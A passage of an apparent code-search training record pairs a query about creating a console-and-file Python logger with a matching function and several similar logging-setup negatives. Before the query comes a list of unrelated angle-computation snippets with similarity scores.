HarmonicAngleForce, there is no growth_index and the parameters are passed separately.\n if isinstance(angle_force, openmm.CustomAngleForce):\n angle_force.addAngle(atom_indices[0], atom_indices[1], atom_indices[2], [angle_radians, angle_force_constant, growth_idx])\n elif isinstance(angle_force, openmm.HarmonicAngleForce):\n angle_force.addAngle(atom_indices[0], atom_indices[1], atom_indices[2], angle_radians, angle_force_constant)\n else:\n raise ValueError(\"Angle force must be either CustomAngleForce or HarmonicAngleForce\")\n return angle_force", "def onePassRadon(self, angleAmount):\n rotated_image = self.rotateImage(angleAmount)\n (N, M) = rotated_image.shape\n radon_values = [0]*M\n for radon_line in range(M):\n linesum = 0\n for pixel in range(N):\n linesum += rotated_image[pixel][radon_line]\n radon_values[M - radon_line - 1] = linesum\n #print(radon_values)\n return radon_values", "def greenhouse_orientation():\n \n # NEED TO CHECK THIS WITH COMPASS (OR IPHONE)\n orientation_angle = 90 # angle between east-west line and the length of the greenhouse (0-90 degree)\n orientation_angle = float(orientation_angle)", "def get_angles_description(self):\n s = []\n for ang in self.gonio_angles:\n s.append(\"%s\" % ang)\n if self.wavelength_control:\n for ang in self.wl_angles:\n s.append(\"%s\" % ang)\n return \"\\n\".join(s)", "def azizen(self):\n # x0,y0 array pixel coordinates relative to cx,cy\n# ndy0,ndx0=img.shape\n ndy0=self.ndy0\n ndx0=self.ndx0\n x0,y0=np.meshgrid(np.linspace(0,ndx0-1,ndx0)-self.cx,np.linspace(0,ndy0-1,ndy0)-self.cy)\n r0=np.sqrt(x0**2+y0**2)/self.pr0 # fractional radial distance from 0,0\n# self.roi=np.s_[ystart:ystart+self.ny0,xstart:xstart+self.nx0]\n # why not model the zenith angle dependence with polynomial directly\n # rather than linear interpolation between roots.\n roots=np.zeros(51)\n rr=np.arange(51)/100.0\n for i,ref in enumerate(rr):\n roots[i]=np.real(np.roots([self.c3,0,self.c2,0,self.c1,-ref])[-1])\n theta0 = np.interp(r0/2,rr,roots)\n \n phi0 = np.arctan2(x0,y0) - self.rot ####phi (i.e., azimuth) is reckoned with -pi corresponding to north, increasing clockwise, NOTE: pysolar use sub-standard definition\n phi0 = phi0%(2*np.pi)\n\n #####correction for the tilt of the camera\n k=np.array((np.sin(self.azm),np.cos(self.azm),0))\n a=np.array([np.sin(theta0)*np.cos(phi0),np.sin(theta0)*np.sin(phi0),np.cos(theta0)]); \n a = np.transpose(a,[1,2,0])\n b=np.cos(self.beta)*a + np.sin(self.beta)*np.cross(k,a,axisb=2) \\\n + np.reshape(np.outer(np.dot(a,k),k),(self.ndy0,self.ndx0,3))*(1-np.cos(self.beta))\n theta0=np.arctan(np.sqrt(b[:,:,0]**2+b[:,:,1]**2)/b[:,:,2])\n phi0=np.arctan2(b[:,:,1],b[:,:,0])%(2*np.pi)\n# max_theta *= deg2rad \n# valid0 = (theta0<max_theta) & (theta0>0); \n# theta0[valid0]=np.nan;\n self.theta0,self.phi0=theta0,phi0", "def reorient_obj(obj, step_ang, plane):\n start_angle = 0\n end_angle = math.pi / 2\n min_area = math.inf\n best_angle = 0\n start_axis = array.array(\"d\", obj.Centroid)\n end_axis = []\n index = [0] * 3\n\n if plane == \"xy\":\n index = [1, 1, 0]\n end_axis = array.array(\"d\", [obj.Centroid[0], obj.Centroid[1], obj.Centroid[2] + 1])\n elif plane == \"xz\":\n index = [1, 0, 1]\n end_axis = array.array(\"d\", [obj.Centroid[0], obj.Centroid[1] + 1, obj.Centroid[2]])\n elif plane == \"yz\":\n index = [0, 1, 1]\n end_axis = array.array(\"d\", [obj.Centroid[0] + 1, obj.Centroid[1], obj.Centroid[2]])\n\n min_pt, max_pt = obj.GetBoundingBox()\n # projecting the points to the plane\n project_points_to_plane(min_pt, max_pt, index)\n while start_angle <= end_angle:\n obj.Rotate3D(start_axis, end_axis, step_ang)\n # compute the area\n dims = [(max_pt[0] - min_pt[0]), (max_pt[1] - min_pt[1]), (max_pt[2] - min_pt[2])]\n curr_area = 1\n for dim in dims:\n if dim > 0:\n curr_area *= dim\n if curr_area < min_area:\n min_area = curr_area\n best_angle = start_angle\n start_angle += step_ang\n min_pt, max_pt = obj.GetBoundingBox()\n # projecting the points to the plane\n project_points_to_plane(min_pt, max_pt, index)\n # rotate the object using the best angle\n obj.Rotate3D(start_axis, end_axis, best_angle)", "def determine_rotation_angle(self, landmarks):\n lp = landmarks['left-eye-center-pos']\n rp = landmarks['right-eye-center-pos']\n return angle_between_points(lp, rp)", "def parse_lats(lines):\n class Parser:\n def __init__(self):\n self.state = 'get_utt_id'\n self.utt_id = ''\n self.out = {}\n\n def is_line_utt_id(self, splited_line):\n return len(splited_line) == 1\n\n def new_utt(self, splited_line):\n self.utt_id = splited_line[0]\n self.out[self.utt_id] = []\n self.state = 'get_arc'\n\n def start(self):\n self.state = 'get_utt_id'\n self.utt_id = ''\n self.out = {}\n\n def add(self, line):\n splited_line = line.split()\n if self.state == 'get_utt_id':\n assert self.is_line_utt_id(splited_line), RuntimeError(\"parse_lats init error.\")\n self.new_utt(splited_line)\n return\n if self.state == 'get_arc':\n # if self.is_line_utt_id(splited_line):\n # self.new_utt(splited_line)\n # else:\n if len(splited_line) == 4:\n # classic arc\n state_from, state_to, word_id = map(int, splited_line[:3])\n weight_hclg, weight_am, ali = splited_line[3].split(',')\n weight_hclg, weight_am = float(weight_hclg), float(weight_am)\n self.out[self.utt_id].append((state_from, state_to, word_id, weight_hclg, weight_am, ali))\n elif len(splited_line) == 3:\n state_from, state_to, word_id = map(int, splited_line[:3])\n weight_hclg, weight_am, ali = 0.0, 0.0, ''\n self.out[self.utt_id].append((state_from, state_to, word_id, weight_hclg, weight_am, ali))\n elif len(splited_line) == 2:\n # eos arc\n state_from = int(splited_line[0])\n weight_hclg, weight_am, ali = splited_line[1].split(',')\n weight_hclg, weight_am = float(weight_hclg), float(weight_am)\n self.out[self.utt_id].append((state_from, weight_hclg, weight_am, ali))\n elif len(splited_line) == 1:\n state_from = int(splited_line[0])\n self.out[self.utt_id].append((state_from, 0, 0, ''))\n elif len(splited_line) == 0:\n self.state = 'get_utt_id'\n else:\n raise RuntimeError(f\"parse_lats Wrong line in {self.utt_id}: {line}\")\n return\n\n def get_out(self):\n return self.out\n\n parser = Parser()\n parser.start()\n for i, line in enumerate(lines):\n parser.add(line)\n utt2lat = parser.get_out()\n return utt2lat", "def decode_angle(target_angs, num_theta_bins):\n if target_angs.shape[-1] == 2 * num_theta_bins:\n # if target_angs.shape[-1] == num_theta_bins + 1:\n bin_inds = np.argmax(target_angs[..., :num_theta_bins], axis=-1)\n bin_res = target_angs[..., num_theta_bins:]\n else:\n bin_inds = target_angs[..., 0]\n bin_res = target_angs[..., 1:]\n\n # orientation\n bin_size = 2.0 * np.pi / num_theta_bins\n bin_res_i = bin_res.reshape(-1, num_theta_bins)[\n np.arange(bin_inds.size), bin_inds.reshape(-1).astype(np.int64)\n ].reshape(bin_inds.shape)\n # bin_res_i = bin_res[..., 0]\n\n angs = (bin_inds + 0.5) * bin_size + bin_res_i # (-pi, 3*pi)\n angs[angs > np.pi] -= 2.0 * np.pi\n\n return angs", "def h_observer(x, marks):\n estimated_obs_angles = []\n for i in range(0, len(marks)):\n dX = [marks[i][0] - x[0], marks[i][1] - x[1], marks[i][2] - x[2]]\n r = np.sqrt(dX[0]**2 + dX[1]**2 + dX[2]**2)\n theta = np.arccos(dX[2]/r)\n phi = np.arctan2(dX[1], dX[0])\n estimated_obs_angles.extend([theta, phi, r]) if ANGLES_ONLY is False else estimated_obs_angles.extend([theta, phi])\n #print(np.array(estimated_obs_angles))\n return np.array(estimated_obs_angles)", "def _takeoff_angles_taup(taup, greens):\r\n\r\n takeoff_angles = np.zeros(len(greens))\r\n\r\n for _i, greens_tensor in enumerate(greens):\r\n\r\n depth_in_km = greens_tensor.origin.depth_in_m/1000.\r\n distance_in_deg = m_to_deg(greens_tensor.distance_in_m)\r\n\r\n takeoff_angles[_i] = _takeoff_angle_taup(\r\n taup, depth_in_km, distance_in_deg)\r\n\r\n return takeoff_angles", "def V_angles(atoms):\n \n Va = 0 # this is the variable we will store the sum of all the energies in\n N = len(atoms)\n for i in range(len(atoms)):\n j = (i+1) % N\n k = (i-1) % N\n x_ij = atoms.coords[j] - atoms.coords[i] # vector from atom i to j\n x_ik = atoms.coords[k] - atoms.coords[i] # vector from atom i to k\n theta = np.arccos(np.dot(x_ij, x_ik)/(norm(x_ij)*norm(x_ik))) # angle between the above two\n \n Va += (theta - TH0)**2\n \n return Va", "def mean_std_angles(angles, interval=(-180,180)):\n # Find the optimal shift to avoid circularity (will fail for large stds)\n opt_shift = find_optimal_angle_window(angles)\n # Calculate the mean and standard deviation with the optimal shift\n ang_mean = numpy.mean(numpy.mod(angles-opt_shift, 360))+opt_shift\n ang_mean = normalise_modular_range(ang_mean, min=interval[0], max=interval[1])\n ang_std = numpy.std(numpy.mod(angles-opt_shift, 360))\n return ang_mean, ang_std", "def execute(self, parameters, messages):\n\n fc = parameters[0].value\n arcpy.CalculatePolygonMainAngle_cartography(fc, \"RotationUTM33\", \"GEOGRAPHIC\")\n\n return", "def deg2rad(a):", "def horizon_angle_to_object(object_info, point):\n object_coords = object_info['axisAlignedBoundingBox']['center'] if 'axisAlignedBoundingBox' in object_info else \\\n object_info['position']\n\n my_height = 1.575\n\n y_delta = object_coords['y'] - my_height\n xz_dist = np.sqrt(np.square(object_coords['x'] - point['x']) + np.square(object_coords['z'] - point['z']))\n r = np.sqrt(np.square(xz_dist) + np.square(y_delta))\n\n angle = np.arctan2(-y_delta / r, xz_dist / r) * 180 / np.pi\n\n if angle < 0:\n angle += 360\n if angle > 360.0:\n angle -= 360.0\n return angle", "def odom_callback(data):\n global x\n global y\n global theta\n x = data.pose.pose.position.x\n y = data.pose.pose.position.y\n rot_q = data.pose.pose.orientation\n (roll, pitch, theta) = euler_from_quaternion([rot_q.x, rot_q.y, rot_q.z, rot_q.w])", "def to_angles(self) -> np.ndarray:\n phi = np.arctan2(2.0*(self.w*self.x + self.y*self.z), 1.0 - 2.0*(self.x**2 + self.y**2))\n theta = np.arcsin(2.0*(self.w*self.y - self.z*self.x))\n psi = np.arctan2(2.0*(self.w*self.z + self.x*self.y), 1.0 - 2.0*(self.y**2 + self.z**2))\n return np.array([phi, theta, psi])", "def circular_mean(angles):\n\n # Convert the angles to cartesian points on the unit circle\n cartesian = np.column_stack((np.cos(angles), np.sin(angles)))\n #breakpoint()\n\n # Find the mean of the cartesian coordinates\n mean_cart = np.mean(cartesian, axis=0)\n\n # Find the angle of the mean point\n mean_angle = np.arctan2(mean_cart[1], mean_cart[0])\n\n # And return it\n return mean_angle" ]
[ "0.56423277", "0.55796504", "0.5485317", "0.532156", "0.5300278", "0.50899595", "0.50719124", "0.50677234", "0.5040855", "0.5008711", "0.5001167", "0.50002366", "0.4993435", "0.49813247", "0.4962279", "0.49208593", "0.49165124", "0.49086887", "0.48858005", "0.48731053", "0.48723224", "0.48558918", "0.48430544", "0.48411146", "0.48357418", "0.4828506", "0.4807861", "0.48014358", "0.4766292", "0.47513896", "0.47353417", "0.4733945", "0.47337496", "0.47316313", "0.47168508", "0.47074506", "0.470537", "0.4702473", "0.4702393", "0.46936724", "0.46921146", "0.46863097", "0.4683394", "0.46803105", "0.4677424", "0.4676402", "0.46656945", "0.46492296", "0.4648502", "0.4632724", "0.46169725", "0.46150485", "0.4603679", "0.459882", "0.4597853", "0.45938855", "0.45930424", "0.45861918", "0.45613223", "0.45543468", "0.45540223", "0.4553873", "0.45525023", "0.45525023", "0.45463517", "0.45424676", "0.45385906", "0.45268166", "0.4526041", "0.45231828", "0.4518904", "0.4513734", "0.45129043", "0.4507501", "0.45073313", "0.45068398", "0.4501346", "0.44978067", "0.44926006", "0.4485177", "0.44832325", "0.44802034", "0.44734493", "0.447338", "0.44701836", "0.44688913", "0.446524", "0.4464126", "0.44506916", "0.44472644", "0.4446752", "0.44446623", "0.44404817", "0.44399285", "0.44270492", "0.44248995", "0.44243932", "0.4412262", "0.43997577", "0.439864" ]
0.7734531
0
Create a logger with console logging (info level) + log file (debug level).
def create_logger(log_dir): logger = logging.getLogger(__file__) logger.setLevel(logging.INFO) # file logger log_filename = "probabilist_connectogram_%s.log" % time.strftime("%Y-%m-%d_%H:%M:%S") if log_dir: log_path = os.path.join(log_dir, log_filename) else: log_path = log_filename file_handler = logging.FileHandler(log_path) formatter = logging.Formatter('%(asctime)s :: %(message)s') file_handler.setFormatter(formatter) file_handler.setLevel(logging.DEBUG) logger.addHandler(file_handler) # console logger console_handler = logging.StreamHandler() console_handler.setLevel(logging.DEBUG) console_handler.setFormatter(formatter) logger.addHandler(console_handler) logger.info("Log path: %s" % log_path) return logger
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_logger():\n logging.basicConfig(level = logging.INFO, filename='logging', filemode='w')\n logger = logging.getLogger(\" \")\n admin_handler = logging.FileHandler('logging')\n admin_handler.setLevel(logging.INFO)\n logger.addHandler(admin_handler)\n logger.warning(f'{admin_handler} created a new logger')\n return logger", "def setup_logger() -> None:\n LOGGER.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(levelname)s \\t|%(asctime)s \\t| %(name)s \\t| %(message)s')\n\n if not check_if_dir_exists(FILENAMES.LOG_DIR):\n os.mkdir(to_abs_file_path(FILENAMES.LOG_DIR))\n\n file_handler: logging.FileHandler = logging.FileHandler(to_abs_file_path(FILENAMES.LOG), mode='w')\n file_handler.setLevel(logging.INFO)\n file_handler.setFormatter(formatter)\n\n console_handler: logging.StreamHandler = logging.StreamHandler()\n console_handler.setLevel(logging.WARNING)\n\n LOGGER.addHandler(file_handler)\n LOGGER.addHandler(console_handler)\n LOGGER.info('Filehandler and Console_Handler were born, let\\'s start logging')", "def create_logger(name, log_file=None):\n l = logging.getLogger(name)\n formatter = logging.Formatter('[%(asctime)s] %(message)s')\n l.setLevel(logging.DEBUG)\n\n sh = logging.StreamHandler()\n sh.setFormatter(formatter)\n sh.setLevel(logging.INFO)\n l.addHandler(sh)\n\n if log_file is not None:\n fh = logging.FileHandler(log_file)\n fh.setFormatter(formatter)\n fh.setLevel(logging.DEBUG)\n l.addHandler(fh)\n\n return l", "def create_logger():\n log = logging.getLogger() # root logger\n log.setLevel(logging.DEBUG)\n format_str = '%(asctime)s - %(levelname)-8s - %(message)s'\n date_format = '%Y-%m-%d %H:%M:%S'\n if os.isatty(2):\n cformat = '%(log_color)s' + format_str\n colors = {'DEBUG': 'reset',\n 'INFO': 'reset',\n 'WARNING': 'bold_yellow',\n 'ERROR': 'bold_red',\n 'CRITICAL': 'bold_red'}\n formatter = colorlog.ColoredFormatter(cformat, date_format,\n log_colors=colors)\n else:\n formatter = logging.Formatter(format_str, date_format)\n stream_handler = logging.StreamHandler()\n stream_handler.setFormatter(formatter)\n log.addHandler(stream_handler)\n return logging.getLogger(__name__)", "def init_logger():\n logpath = Path(f\"logs/{time.strftime('%Y.%m.%d %H:%M')}.txt\")\n logpath.parent.mkdir(exist_ok=True)\n logging.basicConfig(filename=logpath, level=logging.DEBUG)", "def log_setup(self):\n # Logger initialisation\n logger = logging.getLogger(self.app_name)\n logger.setLevel(logging.DEBUG)\n\n # Creating console handler and set level to debug\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n\n # Creating formatter\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n )\n\n # Adding formatter to ch\n ch.setFormatter(formatter)\n\n # Adding ch to logger\n logger.addHandler(ch)\n\n # Setting the Logger Level (INFO)\n logger.setLevel(logging.INFO)\n\n return logger", "def setup_logging(\n level,\n console_level,\n file_level,\n):\n global _LOGGING_INITIALIZED\n if _LOGGING_INITIALIZED:\n logging.debug('SetupLogging: logging system already initialized')\n return\n\n program_name = get_program_name()\n logging.addLevelName(LogLevel.DEBUG_VERBOSE, 'DEBUG_VERBOSE')\n logging.addLevelName(LogLevel.ALL, 'ALL')\n\n # Initialize the logging system:\n\n log_formatter = logging.Formatter(\n fmt='%(asctime)s %(levelname)s %(filename)s:%(lineno)s : %(message)s',\n )\n\n log_formatter.formatTime = _format_time\n\n logging.root.handlers.clear()\n logging.root.setLevel(level)\n\n console_handler = logging.StreamHandler()\n console_handler.setFormatter(log_formatter)\n console_handler.setLevel(console_level)\n logging.root.addHandler(console_handler)\n\n # Initialize log dir:\n tstamp = timestamp()\n pid = os.getpid()\n\n if FLAGS.log_dir is None:\n tmp_dir = os.path.join('/tmp', getpass.getuser(), program_name)\n make_dir(tmp_dir)\n FLAGS.log_dir = tempfile.mkdtemp(\n prefix='%s.%d.' % (tstamp, pid),\n dir=tmp_dir)\n\n # Link current log dir to latest:\n latest_path = os.path.join(tmp_dir, \"latest\")\n remove(latest_path)\n os.symlink(src=os.path.basename(FLAGS.log_dir), dst=latest_path)\n\n logging.info('Using log dir: %s', FLAGS.log_dir)\n make_dir(FLAGS.log_dir)\n\n log_file = os.path.join(FLAGS.log_dir, '%s.%s.%d.log' % (program_name, tstamp, pid))\n\n # Link current log file to latest.log:\n latest_path = os.path.join(FLAGS.log_dir, \"latest.log\")\n remove(latest_path)\n os.symlink(src=log_file, dst=latest_path)\n\n file_handler = logging.FileHandler(filename=log_file)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(file_level)\n logging.root.addHandler(file_handler)\n\n from base import log\n log.set_logger(log.Logger(level=log.Level.ALL))\n\n _LOGGING_INITIALIZED = True", "def create_logger(job_name, log_file=None, debug=True):\n logging.basicConfig(level=5,\n format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',\n datefmt='%m-%d %H:%M')\n logging.root.handlers = []\n if debug:\n chosen_level = 5\n else:\n chosen_level = logging.INFO\n logger = logging.getLogger(job_name)\n formatter = logging.Formatter(fmt='%(asctime)s %(message)s',\n datefmt='%m/%d %H:%M:%S')\n if log_file is not None:\n log_dir = osp.dirname(log_file)\n if log_dir:\n if not osp.exists(log_dir):\n os.makedirs(log_dir)\n # cerate file handler\n fh = logging.FileHandler(log_file)\n fh.setLevel(chosen_level)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n # Colored stream handler\n sh = ColorStreamHandler()\n sh.setLevel(chosen_level)\n sh.setFormatter(formatter)\n logger.addHandler(sh)\n return logger", "def get_console_logger(name=__file__, level=logging.INFO):\n sh_formatter = logging.Formatter(\n \"%(asctime)s - %(levelname)s - %(name)s- %(funcName)s -%(lineno)d-\"\n \" %(message)s\"\n )\n logger = logging.getLogger(name)\n logger.setLevel(level)\n sh = logging.StreamHandler()\n sh.setFormatter(sh_formatter)\n logger.addHandler(sh)\n return logger", "def logger(level, log_info):\n log_path = getconfig(\"log\", \"LOG_PATH\")\n log_level = getconfig(\"log\", \"LOG_LEVEL\")\n log_enable = getconfig(\"log\", \"LOG_ENABLE\")\n log_fname = getconfig(\"log\", \"LOG_FNAME\")\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n log_file = os.path.join(log_path, log_fname)\n # base on input string \"DEBUG\",\"ERROR\"... get level number\n lvl = l_type_lst.index(level)\n\n # now, begin to write into log file\n log_time = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(time.time()))\n log_pid = os.getpid()\n log_script = sys._getframe().f_back.f_code.co_filename.split('/')[-1]\n log_method = sys._getframe().f_back.f_code.co_name\n log_line = sys._getframe().f_back.f_lineno\n with open(log_file, \"a\") as log:\n if lvl <= int(log_level) and bool(log_enable):\n log.write(\"%s %s %s %s:%s:%s %s\\\n\\n\" % (log_time, log_pid, level, log_script, log_method, log_line, log_info))", "def create_logger(log_file=None, file_=True, console=True,\n with_time=False, file_level=2, console_level=2,\n propagate=False, clear_exist_handlers=False, name=None):\n if file_:\n prefix = strftime('%Y%m%d%H%M%S', localtime(time()))\n if log_file is None:\n log_file = os.path.join(os.path.dirname(__file__), prefix)\n elif with_time:\n log_file = os.path.join(os.path.dirname(log_file), prefix + \"_\" + os.path.basename(log_file))\n\n logger = logging.getLogger(name)\n\n if clear_exist_handlers:\n logger.handlers.clear()\n\n logger.setLevel(levels[1])\n logger.propagate = propagate\n\n formatter = MyFormatter(\"(User) %(asctime)s: %(levelname).1s %(message)s\")\n\n if file_:\n # Create file handler\n file_handler = logging.FileHandler(log_file)\n file_handler.setLevel(levels[file_level])\n file_handler.setFormatter(formatter)\n # Register handler\n logger.addHandler(file_handler)\n\n if console:\n # Create console handler\n console_handler = logging.StreamHandler()\n console_handler.setLevel(levels[console_level])\n console_handler.setFormatter(formatter)\n logger.addHandler(console_handler)\n\n return logger", "def _generate_log(path):\n # Create a logger and set the level.\n logger = logging.getLogger(\"Log_info\")\n # Check handler exists\n if len(logger.handlers) > 0:\n return logger # Logger already exists\n # set logger level\n logger.setLevel(logging.DEBUG)\n # Create file handler, log format and add the format to file handler\n stream_handler = logging.StreamHandler()\n file_handler = logging.FileHandler(path)\n\n # See https://docs.python.org/3/library/logging.html#logrecord-attributes\n # for log format attributes.\n log_format = \"%(levelname)s %(asctime)s %(message)s\"\n formatter = logging.Formatter(log_format)\n stream_handler.setFormatter(formatter)\n file_handler.setFormatter(formatter)\n logger.addHandler(stream_handler)\n logger.addHandler(file_handler)\n\n return logger", "def LogInstance(log_file, debug=True):\n logger = logging.getLogger()\n log_formatter = logging.Formatter(\"[%(asctime)s] %(name)s: %(levelname)s: \"\n \"%(message)s\", \"%H:%M:%S\")\n console_formatter = logging.Formatter(\"[%(asctime)s] %(levelname)s: \"\n \"%(message)s\", \"%H:%M:%S\")\n console_log = logging.StreamHandler()\n console_log.setFormatter(console_formatter)\n if debug:\n console_log.setLevel(logging.DEBUG)\n else:\n console_log.setLevel(logging.INFO)\n file_handler = logging.FileHandler(log_file, mode=\"w\")\n file_handler.setFormatter(log_formatter)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(console_log)\n logger.addHandler(file_handler)\n return logger", "def setup_logger(logger: logging.Logger, file_name: str):\n log_fmt = logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s')\n # Console Handler\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(log_fmt)\n # File Handler\n fh = RotatingFileHandler(\n filename=f'log/{file_name}.log',\n maxBytes=int(1e6), backupCount=3,\n encoding='utf-8', mode='a'\n )\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(log_fmt)\n logger.addHandler(fh)\n logger.addHandler(ch)", "def set_logger(console_level = logging.INFO, file_level = logging.DEBUG, include_file = True, append_file = False):\n\n if not append_file:\n try:\n os.remove(curdir + 'tca2.log')\n except:\n pass\n\n logger = logging.getLogger(curdir + 'tca2')\n logger.setLevel(file_level)\n\n ch = logging.StreamHandler()\n ch.setFormatter(logging.Formatter('%(message)s'))\n ch.setLevel(console_level)\n logger.addHandler(ch)\n\n if include_file:\n fh = logging.FileHandler(curdir + 'tca2.log')\n fh.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))\n fh.setLevel(file_level)\n logger.addHandler(fh)\n\n return logger", "def setupLogger():\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(name)s %(levelname)s: %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename='prepareToSubmit.log',\n filemode='w')\n # define a Handler which writes INFO messages or higher to the sys.stderr\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n # set a format which is simpler for console use\n formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)", "def setup_logger(filename, write_file=True):\n\n logging.getLogger(\"requests\").setLevel(logging.WARNING)\n\n _log = logging.getLogger()\n _log.setLevel(logging.DEBUG)\n\n formatter = logging.Formatter('%(message)s')\n formatter_console = logging.Formatter('%(levelname)s - %(message)s')\n\n if write_file:\n fh = logging.FileHandler(filename, mode='a')\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n _log.addHandler(fh)\n\n ch = logging.StreamHandler()\n ch.setLevel(logging.INFO)\n ch.setFormatter(formatter_console)\n _log.addHandler(ch)\n\n return _log", "def get_logger(level=logging.INFO, quite=False, debug=False, to_file=''):\n assert level in [logging.DEBUG, logging.INFO, logging.WARNING, logging.CRITICAL]\n logger = logging.getLogger('main')\n formatter = logging.Formatter('%(asctime)s - %(funcName)s - %(levelname)s - %(message)s')\n if debug:\n level = logging.DEBUG\n logger.setLevel(level=level)\n if not quite:\n if to_file:\n fh = logging.FileHandler(to_file)\n fh.setLevel(level=level)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n else:\n ch = logging.StreamHandler()\n ch.setLevel(level=level)\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n return logger", "def create_logger(\n project_name: str,\n level: str = \"INFO\",\n log_dir: str = \"/tmp/logs\",\n file_name: Optional[str] = None,\n do_print: bool = True,\n simple_logging: bool = False,\n log_to_file: bool = False,\n rich_logging: bool = False,\n time_zone: Optional[str] = None,\n):\n import __main__\n\n if file_name is None:\n try:\n file_name = ntpath.basename(__main__.__file__).split(\".\")[0]\n except:\n file_name = \"logs\"\n\n logger = logging.getLogger(file_name)\n logger.handlers.clear()\n logger.setLevel(getattr(logging, level))\n\n if time_zone:\n from pytz import timezone, utc\n def time_formatter(*args):\n # TODO: Doesnt work with rich formatter\n utc_dt = utc.localize(datetime.datetime.utcnow())\n my_tz = timezone(time_zone)\n converted = utc_dt.astimezone(my_tz)\n return converted.timetuple()\n\n logging.Formatter.converter = time_formatter\n\n if rich_logging:\n from rich.logging import RichHandler\n stream_format = f\"{project_name}:%(module)s:%(funcName)s: %(message)s\"\n stream_handler = RichHandler(omit_repeated_times=False)\n else:\n stream_format = f\"%(asctime)s:%(levelname)s:{project_name}:%(module)s:%(funcName)s: %(message)s\"\n stream_handler = logging.StreamHandler()\n\n file_formatter = stream_formatter = logging.Formatter(\n stream_format, \"%Y-%m-%d %H:%M:%S\"\n )\n\n if simple_logging:\n file_formatter = logging.Formatter(\"%(message)s\")\n stream_formatter = logging.Formatter(\"%(message)s\")\n\n if log_to_file:\n date = datetime.date.today()\n date = \"%s-%s-%s\" % (date.day, date.month, date.year)\n log_file_path = os.path.join(log_dir, \"%s-%s.log\" % (file_name, date))\n\n create_folder(log_dir)\n file_handler = logging.FileHandler(log_file_path)\n file_handler.setFormatter(file_formatter)\n logger.addHandler(file_handler)\n\n if do_print:\n stream_handler.setFormatter(stream_formatter)\n logger.addHandler(stream_handler)\n\n logger.propagate = False\n\n return logger", "def logger_setup(self, logger_name):\n logger = logging.getLogger(logger_name)\n logger_path = \"/tmp/\" + logger.name\n logger_format = '%(asctime)s %(name)s %(levelname)s %(lineno)d %(message)s'\n\n # set up logging to file\n logging.basicConfig(\n level=logging.INFO,\n format=logger_format,\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=logger_path,\n filemode='w'\n )\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n # set a format which for console use\n formatter = logging.Formatter(logger_format)\n # tell the handler to use this format\n console.setFormatter(formatter)\n # add the handler to the root logger\n logging.getLogger('').addHandler(console)\n return logger", "def create_logger(**kwargs):\n\n log = logging.getLogger()\n log.setLevel(logging.INFO)\n\n # Create Log Format(s)\n f_format = logging.Formatter('%(asctime)s:%(processName)s:%(name)s:%(levelname)s:%(message)s')\n\n # Create Handlers\n c_handler = logging.StreamHandler()\n c_handler.setLevel(logging.INFO)\n c_handler.setFormatter(f_format)\n log.addHandler(c_handler)\n\n for filename, level in kwargs.items():\n handler = logging.FileHandler(filename=filename)\n handler.setLevel(level)\n handler.setFormatter(f_format)\n log.addHandler(handler)\n\n return log", "def _get_logger(filename='test_install.log'):\n logger = logging.getLogger('test_install.py')\n logger.setLevel(logging.DEBUG)\n\n console_handler = logging.StreamHandler()\n console_handler.setLevel(logging.INFO)\n\n file_handler = logging.FileHandler(filename)\n file_handler.setLevel(logging.DEBUG)\n\n logger.addHandler(console_handler)\n logger.addHandler(file_handler)\n\n return logger", "def init_log(log_level=logging.DEBUG):\n now = time.time()\n ts = datetime.datetime.fromtimestamp(now).strftime('%Y%m%d')\n file_name = os.path.abspath(os.path.join(os.getcwd(), '..', 'traffic_logs', f'{ts}_traffic.log'))\n folder, _ = os.path.split(file_name)\n Path(folder).mkdir(parents=True, exist_ok=True)\n\n # create formatter and add it to the handlers\n log_format = '[%(asctime)s][%(name)s][%(levelname)s] %(message)s'\n\n logging.basicConfig(filemode='a',\n format=log_format,\n datefmt='%H:%M:%S',\n level=logging.ERROR,\n stream=sys.stdout,\n # filename=file_handler\n )\n\n formatter = logging.Formatter(log_format)\n\n # create file handler which logs even debug messages\n file_handler = logging.FileHandler(file_name)\n file_handler.setFormatter(formatter)\n file_handler.setLevel(log_level)\n\n std_out = logging.StreamHandler(sys.stdout)\n std_out.setFormatter(formatter)\n std_out.setLevel(log_level)\n\n # This for avoiding streams to log to root's stderr, which prints in red in jupyter\n root_logger = logging.getLogger()\n for handler in root_logger.handlers:\n # continue\n root_logger.removeHandler(handler)\n\n # add the handlers to the logger\n root_logger.addHandler(file_handler)\n\n # By default the install() function installs a file_handler on the root root_logger,\n # this means that log messages from your code and log messages from the\n # libraries that you use will all show up on the terminal.\n coloredlogs.install(level=log_level, fmt=log_format, stream=sys.stdout)", "def setup_logger(logLevel=\"DEBUG\"):\n logmoduleconsole = logging.getLogger(f\"{__name__}.console\")\n logmoduleconsole.propagate = False\n logmoduleconsole.setLevel(logLevel)\n\n module_console_handler = logging.StreamHandler()\n\n # log_format_module = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n log_format_module = \"%(name)s - %(levelname)s: %(message)s\"\n # log_format_module = '%(levelname)s: %(message)s'\n formatter = logging.Formatter(log_format_module)\n 